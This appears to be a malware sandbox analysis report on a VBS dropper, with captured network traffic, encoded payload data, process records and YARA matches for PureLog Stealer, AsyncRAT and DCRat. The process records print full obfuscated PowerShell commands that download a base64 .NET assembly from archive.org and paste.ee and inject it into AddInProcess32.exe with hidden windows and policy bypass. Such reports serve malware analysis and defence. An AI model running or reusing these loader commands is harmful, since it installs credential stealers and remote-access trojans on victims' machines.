                                        2024-10-02 03:23:11 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                        Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                        2024-10-02 03:23:11 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                        Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                        2024-10-02 03:23:11 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                        Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.949706188.114.96.34436528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 03:23:13 UTC67OUTGET /d/AaTNM/0 HTTP/1.1
                                        Host: paste.ee
                                        Connection: Keep-Alive
                                        2024-10-02 03:23:14 UTC1206INHTTP/1.1 200 OK
                                        Date: Wed, 02 Oct 2024 03:23:14 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=2592000
                                        strict-transport-security: max-age=63072000
                                        x-frame-options: DENY
                                        x-content-type-options: nosniff
                                        x-xss-protection: 1; mode=block
                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IAbkmIo5MsFm7uyYvRX7FEScMC9gCPAvyP%2BqvyaNLGVEEPpRK1t8OPchf%2FEKT0fF%2BktuD7lgYfovzJNNVu2%2FH8CyadA6CXY8b6yqUQJNiYSoshPGH6zT4aiIHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cc19293f9681a3c-EWR
                                        2024-10-02 03:23:14 UTC163INData Raw: 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        2024-10-02 03:23:14 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        2024-10-02 03:23:14 UTC1369INData Raw: 63 6c 42 46 49 73 49 6a 56 79 39 47 64 70 35 32 62 4e 4a 58 5a 51 35 6a 49 7a 64 6d 62 70 52 48 64 6c 4e 31 63 33 39 47 5a 75 6c 32 56 76 59 54 4d 77 49 7a 4c 4a 31 30 55 76 30 32 62 6a 35 43 64 6d 39 32 63 76 4a 33 59 70 31 6d 4c 7a 46 57 62 6c 68 32 59 7a 39 79 4c 36 41 48 64 30 68 6d 49 39 4d 6e 62 73 31 47 65 67 4d 33 63 6c 35 57 5a 79 46 32 64 42 6c 47 63 6b 78 54 43 4a 6f 51 44 2b 55 6d 63 68 64 58 51 70 42 48 5a 76 77 54 5a 31 4a 48 64 2b 49 79 63 6e 35 57 61 30 52 58 5a 54 4e 33 64 76 52 6d 62 70 64 31 4c 31 41 44 4d 79 38 53 53 4e 4e 31 4c 74 39 32 59 75 51 6e 5a 76 4e 33 62 79 4e 57 61 74 35 79 63 68 31 57 5a 6f 4e 32 63 76 38 69 4f 77 52 48 64 6f 4a 53 50 7a 35 47 62 74 68 48 49 6c 4a 58 59 33 46 55 61 77 52 47 50 67 41 43 49 67 41 43 49 4b 30
                                        Data Ascii: clBFIsIjVy9Gdp52bNJXZQ5jIzdmbpRHdlN1c39GZul2VvYTMwIzLJ10Uv02bj5Cdm92cvJ3Yp1mLzFWblh2Yz9yL6AHd0hmI9Mnbs1GegM3cl5WZyF2dBlGckxTCJoQD+UmchdXQpBHZvwTZ1JHd+Iycn5Wa0RXZTN3dvRmbpd1L1ADMy8SSNN1Lt92YuQnZvN3byNWat5ych1WZoN2cv8iOwRHdoJSPz5GbthHIlJXY3FUawRGPgACIgACIK0
                                        2024-10-02 03:23:14 UTC1073INData Raw: 67 41 43 49 67 41 43 49 4b 30 67 50 74 30 43 49 34 41 79 63 33 39 47 5a 75 6c 32 56 67 30 53 4c 68 77 44 49 67 41 43 49 67 41 69 43 4e 6f 51 44 2b 30 53 4c 2b 38 43 49 69 30 58 59 7a 6b 6a 5a 31 49 6a 4d 77 51 44 4e 79 45 57 4c 6b 4a 54 5a 34 30 43 5a 69 5a 47 4e 74 59 54 4f 6b 56 54 4c 68 6c 6a 59 34 4d 54 4d 31 4d 7a 65 69 30 44 5a 4a 42 79 55 50 52 57 5a 30 4a 33 62 77 42 58 64 7a 78 54 4c 74 45 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 74 30 43 49 33 41 79 63 33 39 47 5a 75 6c 32 56 67 30 53 4c 68 77 44 49 67 41 43 49 67 41 69 43 4e 6f 51 44 2b 30 53 4c 2b 38 43 49 69 30 48 4d 6d 4e 44 5a 7a 55 57 5a 6c 52 47 4f 77 41 54 4c 6c 5a 57 4e 68 31 53 4e 6a 4e 44 4e 74 59 44 4e 31 45 54 4c 33 55 44 4e 78 45 44 4d 79 55 32 65 69 30 44 5a 4a 42 79 55 50 52 57
                                        Data Ascii: gACIgACIK0gPt0CI4Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0XYzkjZ1IjMwQDNyEWLkJTZ40CZiZGNtYTOkVTLhljY4MTM1Mzei0DZJByUPRWZ0J3bwBXdzxTLtECPgACIgACIK0gPt0CI3Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0HMmNDZzUWZlRGOwATLlZWNh1SNjNDNtYDN1ETL3UDNxEDMyU2ei0DZJByUPRW
                                        2024-10-02 03:23:14 UTC1369INData Raw: 33 66 66 61 0d 0a 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38 41 43 49 4b 30 67 50 76 49 43 63 77 46 6d 4c 75 39 57 61 30 46 32 59 70 78 47 63 77 46 55 65 4e 4a 53 50 6c 31 57 59 75 42 69 49 77 34 79 4e 75 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 53 65 30 6c 47 64 75 56 47 5a 4a 6c 48 62 69 31 57 5a 7a 4e 58 59 38 41 43 49 4b 30 67 50 69 45 6a 64 75 30 32 63 68 70 54 62 76 4e 57 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 62 74 4d 58 59 74 56 47 61 6a 4e 6e 4f 75 4a 58 64 69 30 7a 63 75 78 57 62 34 42 69 49 77 34 53 4d 69 30 6a 62 76 6c 32 63 79 56 6d 56 30 4e 58 5a 6d 6c 6d 62 68 31 47 49
                                        Data Ascii: 3ffaD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4yNuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiEjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BiIw4SMi0jbvl2cyVmV0NXZmlmbh1GI
                                        2024-10-02 03:23:14 UTC1369INData Raw: 47 41 41 41 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 67 44 41 41 41 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 46 41 41 41 41 47 41 43 41 41 67 41 41 41 41 41 42 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: GAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAEAAAAAAAAAAAAAAAAAAAAIAAgDAAAQAAEAAAAAAAAAAAAAAAAAAAAIAAAFAAAAGACAAgAAAAABACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                        2024-10-02 03:23:14 UTC1369INData Raw: 42 64 55 6d 45 46 30 68 44 48 63 41 44 4f 77 68 41 48 51 41 47 56 4a 52 48 49 67 77 41 67 67 41 48 49 45 41 41 45 45 77 45 41 4d 68 41 54 49 41 49 49 77 42 45 4e 46 42 45 56 4a 52 44 43 4b 52 41 45 41 53 44 4e 46 52 65 42 4b 52 41 41 63 41 50 53 30 55 45 63 55 6c 45 59 55 6c 45 64 67 6a 45 5a 4a 42 43 48 45 68 41 38 49 52 56 53 4d 51 55 53 55 52 43 41 4a 52 41 48 51 41 41 54 30 42 41 67 55 67 44 42 6b 68 45 56 55 51 42 43 4b 42 41 67 55 51 39 42 4b 42 41 67 55 51 38 42 4b 42 41 67 55 51 41 43 4b 52 41 42 41 69 42 31 48 6f 45 49 49 77 42 47 30 65 67 52 34 67 41 43 41 79 42 35 46 6f 45 49 45 41 41 47 34 51 43 73 45 42 47 45 63 77 42 70 48 6f 45 42 45 41 49 47 45 65 67 52 34 51 41 43 41 79 42 63 34 51 41 43 41 53 42 4f 34 67 44 4f 4d 41 41 47 55 64 67 52 34
                                        Data Ascii: BdUmEF0hDHcADOwhAHQAGVJRHIgwAggAHIEAAEEwEAMhATIAIIwBENFBEVJRDCKRAEASDNFReBKRAAcAPS0UEcUlEYUlEdgjEZJBCHEhA8IRVSMQUSURCAJRAHQAAT0BAgUgDBkhEVUQBCKBAgUQ9BKBAgUQ8BKBAgUQACKRABAiB1HoEIIwBG0egR4gACAyB5FoEIEAAG4QCsEBGEcwBpHoEBEAIGEegR4QACAyBc4QACASBO4gDOMAAGUdgR4
                                        2024-10-02 03:23:14 UTC1369INData Raw: 74 46 6d 63 47 52 68 44 55 42 51 41 77 34 43 4e 32 31 6a 62 76 6c 32 63 79 56 6d 56 73 73 6d 63 76 64 58 5a 74 46 6d 63 47 52 56 52 4f 35 69 47 41 45 77 52 41 41 41 4d 75 63 6a 4c 77 34 53 4d 48 41 51 41 4d 41 41 41 41 41 51 41 46 41 41 41 41 41 41 41 43 41 51 41 49 30 49 67 52 45 51 41 67 59 51 41 7a 64 33 62 79 68 47 56 75 39 57 61 30 42 58 5a 6a 68 58 52 75 39 6d 54 77 46 6d 63 58 5a 68 41 55 42 51 41 41 45 67 48 41 41 41 41 41 41 41 43 41 45 41 43 49 45 51 41 67 51 41 6b 41 47 68 42 45 6f 51 66 53 45 67 41 41 59 77 43 39 4a 52 41 43 41 67 42 43 30 6e 45 42 49 41 41 47 77 51 66 53 45 67 41 41 59 51 44 39 4a 52 41 43 41 67 42 46 30 52 66 53 45 67 41 41 63 67 44 39 4a 52 41 43 41 67 42 39 4a 52 41 42 41 51 42 39 4a 52 42 4f 49 41 41 47 30 6e 45 4f 45 41
                                        Data Ascii: tFmcGRhDUBQAw4CN21jbvl2cyVmVssmcvdXZtFmcGRVRO5iGAEwRAAAMucjLw4SMHAQAMAAAAAQAFAAAAAAACAQAI0IgREQAgYQAzd3byhGVu9Wa0BXZjhXRu9mTwFmcXZhAUBQAAEgHAAAAAAACAEACIEQAgQAkAGhBEoQfSEgAAYwC9JRACAgBC0nEBIAAGwQfSEgAAYQD9JRACAgBF0RfSEgAAcgD9JRACAgB9JRABAQB9JRBOIAAG0nEOEA
                                        2024-10-02 03:23:14 UTC1369INData Raw: 41 41 43 45 6f 41 41 49 4d 51 42 64 41 41 43 45 45 68 45 41 67 41 42 4e 49 42 41 49 51 67 44 42 45 41 41 45 67 6e 45 42 45 41 41 46 77 52 41 42 41 41 42 70 49 52 41 42 41 51 42 6c 45 52 49 53 30 68 45 63 49 41 42 41 6f 67 44 43 45 41 41 45 67 51 41 42 41 41 42 49 41 41 41 44 77 42 41 41 4d 67 41 42 45 41 41 45 55 68 45 42 45 41 41 46 55 68 45 41 41 41 42 4b 45 51 41 41 51 67 43 41 41 77 41 46 30 52 41 42 41 51 42 46 30 42 41 41 51 51 45 53 45 51 41 41 55 51 45 53 41 41 41 45 30 67 45 42 45 41 41 46 30 67 45 41 41 41 42 34 4a 52 41 5a 49 52 46 47 63 41 43 47 49 41 48 47 49 67 41 47 49 51 46 53 59 77 41 4b 59 67 41 46 30 68 42 44 45 68 45 47 4d 51 44 53 59 77 41 43 41 41 41 44 67 6d 45 47 4d 51 43 53 59 77 41 4f 59 67 41 42 41 41 49 44 45 41 41 41 4d 51 69
                                        Data Ascii: AACEoAAIMQBdAACEEhEAgABNIBAIQgDBEAAEgnEBEAAFwRABAABpIRABAQBlERIS0hEcIABAogDCEAAEgQABAABIAAADwBAAMgABEAAEUhEBEAAFUhEAAABKEQAAQgCAAwAF0RABAQBF0BAAQQESEQAAUQESAAAE0gEBEAAF0gEAAAB4JRAZIRFGcACGIAHGIgAGIQFSYwAKYgAF0hBDEhEGMQDSYwACAAADgmEGMQCSYwAOYgABAAIDEAAAMQi
                                        2024-10-02 03:23:14 UTC1369INData Raw: 67 62 41 6b 47 41 74 42 41 5a 41 45 30 43 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41 6c 42 67 56 50 41 41 41 6f 42 41 64 41 45 47 41 51 6c 41 41 41 45 47 41 79 42 51 5a 41 30 47 41 68 42 77 51 4e 41 41 41 30 42 51 61 41 49 47 41 79 41 77 4d 4c 41 41 41 6c 42 77 63 41 77 47 41 68 42 67 52 4c 41 41 41 30 42 51 61 41 49 47 41 30 41 67 4e 4c 41 41 41 6c 42 51 64 41 49 48 41 55 6c 41 41 41 41 79 41 41 41 41 64 41 59 47 41 76 42 77 63 41 38 47 41 79 42 77 59 41 6b 47 41 4e 4e 42 41 41 4d 46 41 50 56 41 41 41 49 48 41 6c 42 77 63 41 55 56 43 41 41 41 52 41 6b 45 41 58 42 41 53 4a 41 41 41 76 42 67 5a 41 34 47 41 4a 42 41 64 41 34 47 41 6c 42 51 61 41 77 47 41 44 56 42 41 41 51 45 41 4a 42 77 56 41 67 45 41 67 41 67 63 41 49 48 41 46 46 42 41 41 49 44 41 34
                                        Data Ascii: gbAkGAtBAZAE0CAAgbA8GApBwcAIHAlBgVPAAAoBAdAEGAQlAAAEGAyBQZA0GAhBwQNAAA0BQaAIGAyAwMLAAAlBwcAwGAhBgRLAAA0BQaAIGA0AgNLAAAlBQdAIHAUlAAAAyAAAAdAYGAvBwcA8GAyBwYAkGANNBAAMFAPVAAAIHAlBwcAUVCAAARAkEAXBASJAAAvBgZA4GAJBAdA4GAlBQaAwGADVBAAQEAJBwVAgEAgAgcAIHAFFBAAIDA4


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:23:23:05
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs"
                                        Imagebase:0x7ff628350000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:23:23:05
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:23:05
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:4
                                        Start time:23:23:08
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1506314735.000001DFC57A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:23:13
                                        Start date:01/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                        Imagebase:0x9d0000
                                        File size:43'008 bytes
                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
